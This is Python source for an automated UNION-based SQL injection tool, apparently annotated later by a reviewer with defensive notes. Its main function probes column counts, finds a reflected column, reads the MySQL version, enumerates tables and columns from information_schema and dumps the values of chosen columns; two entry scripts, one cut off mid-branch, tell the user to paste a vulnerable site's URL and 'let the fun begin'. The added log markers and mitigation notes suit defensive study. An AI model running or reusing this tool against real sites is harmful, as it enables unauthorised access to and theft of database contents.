def union_normal(self):
    """Interactively drive a UNION-based SQL injection against one URL.

    The routine prompts for a URL, then issues a series of HTTP requests whose
    query strings are built by string replacement. In order, it probes the
    column count, looks for a reflected column, reads ``@@version``, lists
    table and column names from ``information_schema``, and prints the values
    of columns the operator picks. It targets MySQL 5.0/5.1 only (see
    ``versions`` and the "5.0"/"5.1" check). Any failed step calls ``exit()``.

    Defensive notes: every request built here carries literal markers that
    show up in web-server and WAF logs: ``+OrDER+By+``, ``+UNION+SELECT+``,
    ``@@version``, ``information_schema.tables`` / ``.columns``,
    ``unhex(hex(group_concat(`` and the ``0x3a,0x3a`` separators. The keyword
    casing is mixed, so matching should be case-insensitive. Parameterised
    queries in the target application remove the injection point that this
    routine depends on.

    NOTE(review): the listing lost its indentation, so the nesting below is a
    best reading. In particular, the extent of the outer ``while flag=='1'``
    loop is an assumption. ``self`` is never used.
    """
    # MySQL version strings that are reported verbatim when found in a response.
    versions = ["5.1.41","5.1.61","5.0.96","5.1.66","5.1.56"]
    check = 3  # not read anywhere in this function
    flag='1'
    while flag=='1':
        a=1  # not read anywhere in this function
        site=raw_input("Give the url: ")
        # site_alive() is defined elsewhere; "-1" is treated as "no response".
        site=site_alive(site)
        if site=="-1":
            print "No response from server"
            print "Program will exit"
            exit()
        # vuln() is defined elsewhere; "-1" aborts. Any other return value is
        # later used as a substring of the URL (presumably the injected
        # parameter's value; verify against vuln()).
        flag=vuln(site)
        if flag=="-1":
            exit()
        site1=site
        site1=site1+"+OrDER+By+"
        # ft_cols() is defined elsewhere; presumably returns the column count
        # of the injected query, with -1 meaning failure.
        columns=ft_cols(site,site1)
        if columns==-1:
            exit()
        site1=site1.replace("+OrDER+By+","")
        # Build "1,2,...,columns" as the placeholder select list.
        num_columns="1"
        for i in range (2,columns+1):
            # i never equals columns+1 inside this range, so only the else
            # branch runs.
            if i==(columns+1):
                num_columns=num_columns+str(i)
            else:
                num_columns=num_columns+","+str(i)
        site=site1+"+UNION+SELECT+%s--" %num_columns
        site=site.replace("'","")
        # Appends "-" to every occurrence of the value returned by vuln().
        site=site.replace(flag,flag+"-")
        vuln_column=1
        flag=1
        the_page = get_the_page(site)
        # Look for a placeholder number echoed between ">" and "<" in the page.
        # flag: 1 = still searching, 0 = found, 2 = none of the columns reflected.
        while flag==1:
            if (">"+str(vuln_column)+"<") in the_page:
                flag=0
            else:
                vuln_column=vuln_column+1
                if vuln_column>columns:
                    flag=2
        if flag==2:
            # Runtime message is Greek: "There are no vulnerable columns".
            print "Den uparxoun vulnerable columns"
            print "Program will exit"
            exit()
        vuln_column=str(vuln_column)
        # Only the first ",<n>" match is replaced, so a reflected column 1
        # (which has no leading comma) is not handled by this replace.
        site=site.replace(",%s" %vuln_column,",@@version",1)
        the_page=get_the_page(site)
        flag=1
        index=0
        # Report the first known version string found in the response.
        while index<len(versions):
            if versions[index] in the_page:
                print "SQL Version: %s" %versions[index]
                index=len(versions)+1
            else:
                index=index+1
        # A bare "5.0"/"5.1" anywhere in the page also counts as success.
        if flag==1:
            if ("5.0" in the_page) or ("5.1" in the_page):
                flag=0
        if flag==1:
            print "Could not get the DB version."
            print "Program will exit"
            exit()
        # Table enumeration request against information_schema.tables.
        site=site.replace("@@version","unhex(hex(group_concat(0x3a,0x3a,table_name,0x3a,0x3a,0x0a)))")
        site=site.replace("--","+FROM+information_schema.tables+WHERE+table_schema=database()--")
        the_page=get_the_page(site)
        # s_data.search_for() is defined elsewhere; presumably extracts the
        # "::"-delimited values from the page (confirm).
        tables=s_data.search_for(the_page)
        print "Tables found %d" %len(tables)
        print tables
        # Switch the template to column enumeration; the hex table name is
        # appended per iteration below.
        site=site.replace("table_name","column_name")
        site=site.replace("+FROM+information_schema.tables+WHERE+table_schema=database()--","+FROM+information_schema.columns+WHERE+table_name=0x")
        flag=1
        site1=site
        while flag==1:
            print "Give the table: "
            table1=raw_input(">>>")
            while not(table1 in tables):
                # NOTE(review): this literal is split across the listing's
                # line break; it is rejoined here on the assumption that the
                # break is a wrap artefact.
                print "Wrong input. Give the table: "
                table1=raw_input(">>>")
            # Python 2 str-to-hex codec; the table name is sent as a 0x literal.
            table1=table1.encode("hex")
            site=site1+table1+"--"
            the_page=get_the_page(site)
            columns_found=s_data.search_for(the_page)
            if len(columns_found)==0:
                print "No columns found. Do you want to try an other table? (y/n)"
                ans=raw_input(">>>")
                while not(ans=='y' or ans=='n' or ans=='Y' or ans=='N'):
                    print "No columns found. Do you want to try an other table? (y/n)"
                    ans=raw_input(">>>")
                if ans=='N' or ans=='n':
                    print 'Program will Exit'
                    exit()
                else:
                    flag=1
            elif flag==1:
                print "Columns Found %d" %len(columns_found)
                print "="*80
                print columns_found
                print "="*80
                k=0    # number of columns chosen so far
                ks=[]  # chosen column names, in selection order
                table_choose=table1.decode("hex")
                # Point the query at the chosen table instead of information_schema.
                site=site.replace("information_schema.columns+WHERE+table_name=0x"+table1+"--",table_choose+"--")
                tal_cols=len(columns_found)
                # ",/**/" is a textual marker for where the next column is spliced in.
                while tal_cols>0:
                    # Prompt is Greek: "Give a column (0 to give no more)".
                    col_choose=raw_input("Dose ena column (0 gia na mhn dwseis kanena allo): ")
                    while not(col_choose in columns_found) and not(col_choose=='0'):
                        col_choose=raw_input("Dose ena column (0 gia na mhn dwseis kanena allo): ")
                    if col_choose=="0":
                        tal_cols=0
                        site=site.replace(",/**/","")
                    else:
                        if tal_cols==len(columns_found):
                            # First pick replaces the "column_name" placeholder.
                            site=site.replace("column_name","%s,/**/" %col_choose)
                            tal_cols=tal_cols-1
                            k=1
                            ks.append(col_choose)
                        else:
                            site=site.replace(",/**/",",0x3a,0x3a,%s,/**/"%col_choose)
                            tal_cols=tal_cols-1
                            if tal_cols==0:
                                site=site.replace(",/**/",'')
                            # NOTE(review): these two lines are assumed to sit
                            # outside the tal_cols==0 check; confirm.
                            ks.append(col_choose)
                            k=k+1
                the_page=get_the_page(site)
                length=len(the_page)  # overwritten below before it is read
                # Parser choice depends on whether k is odd or even; both
                # helpers are defined elsewhere.
                if k%2==1:
                    total_data=s_data.search_for(the_page)
                else:
                    total_data=s_data.search_for_2(the_page,k)
                length=len(total_data)
                l=0
                # Print k values per row as "name : value |".
                for i in range (0,length,k):
                    j=0
                    while j<k:
                        if j+1==k:
                            print ks[j],":",total_data[l],"|"
                            j=j+1
                            l=l+1
                        else:
                            # Trailing comma keeps the row on one output line.
                            print ks[j],":",total_data[l],"|",
                            j=j+1
                            l=l+1
                # Prompt is Greek: "Do you want to look at another table? (y/n)".
                ans=raw_input("8es na deis gia allo table? (y/n): ")
                while not (ans=='y' or ans=='Y' or ans=='n' or ans=='N'):
                    ans=raw_input("8es na deis gia allo table? (y/n): ")
                if ans=='y' or ans=='Y':
                    flag=1
                else:
                    flag=0
# Entry script (Python 2) for a later revision of the tool. The inline logic
# is delegated to helpers defined elsewhere (ft_cols, uni_cols, f_vuln_col,
# replaces.repl, dbs.*); what they do cannot be confirmed from this listing.
# Defensive note: nothing visible here checks that the operator is authorised
# to test the URL. The target-side mitigation is parameterised queries, plus
# log alerting on UNION/ORDER BY probing.
# NOTE(review): the listing lost its indentation; the nesting is a best reading.
print "BETA VERSION\n"
print "|<~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>|"
print "|<~~~~~~~ Sql Injection Tool ~~~~~~~>|"
print "|<~~~~~~ Coded By: Mr.Crowley ~~~~~~>|"
print "|<~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>|\n"
print "Instructions:"
print "Find a vulnerable to sql-injection site"
print "paste below the url and let the fun begin! =D"
print "Example: http://www.somesite.com/articles.php?id=1'\n\n"
flag='1'
while flag=='1':
    site=raw_input("Give the url: ")
    # Only URLs that contain a single quote are processed.
    if "'" in site:
        site = site_alive(site)
        # The return value is later used as a substring of the URL
        # (presumably the injected parameter's value; verify against vuln()).
        flag = vuln(site)
        columns,based=ft_cols(site)
        site=uni_cols(site,columns,based)
        # Appends "-" to every occurrence of the value returned by vuln().
        site=site.replace(flag,flag+"-")
        print site
        vuln_column=str(f_vuln_col(site,columns))
        site=replaces.repl(site,1,vuln_column)
        dbs.version(site)
        dbs.user(site)
        dbs_names=dbs.names(site)
        ans=dbs.working_db(site)
        # NOTE(review): the listing is cut off here; the body of this branch
        # is not shown.
        if ans=='1':
# Entry script (Python 3) for the class-based revision: it obtains a URL,
# requires it to contain a single quote, then runs the InjectDatabase steps in
# a fixed order. InjectDatabase, site_alive and vuln are defined elsewhere.
# Defensive note: nothing visible here checks that the operator is authorised
# to test the URL. On the target side, parameterised queries remove the
# injection point.
# NOTE(review): the listing lost its indentation; in particular, the placement
# of `if not flag:` after the loop is an assumption.
flag = 1
while flag:
    # the first param given from terminal, $ python main.py site.com
    try:
        site = sys.argv[1]
    except IndexError:
        # No command-line argument was given: fall back to an interactive prompt.
        print('Enter a url to test:')
        site = input(">>> ")
    # Put the URL of the vulnerable site here
    # site = "http://www.xxx.xxx/sql.php?id=1'"
    if "'" in site:
        site = site_alive(site)
        vuln_param = vuln(site)
        flag = 0  # leave the prompt loop
    else:
        print("Site doesn't look vulnerable")
        print("Enter url with ' :")
        site = input(">>> ")

if not flag:
    # Fixed pipeline; each method is defined on InjectDatabase elsewhere.
    find_data = InjectDatabase(site, vuln_param)
    find_data.total_columns()
    find_data.vulnerable_column()
    find_data.database_information()
    find_data.find_tables_of_database()
    find_data.select_table()
    find_data.search_data_from_columns()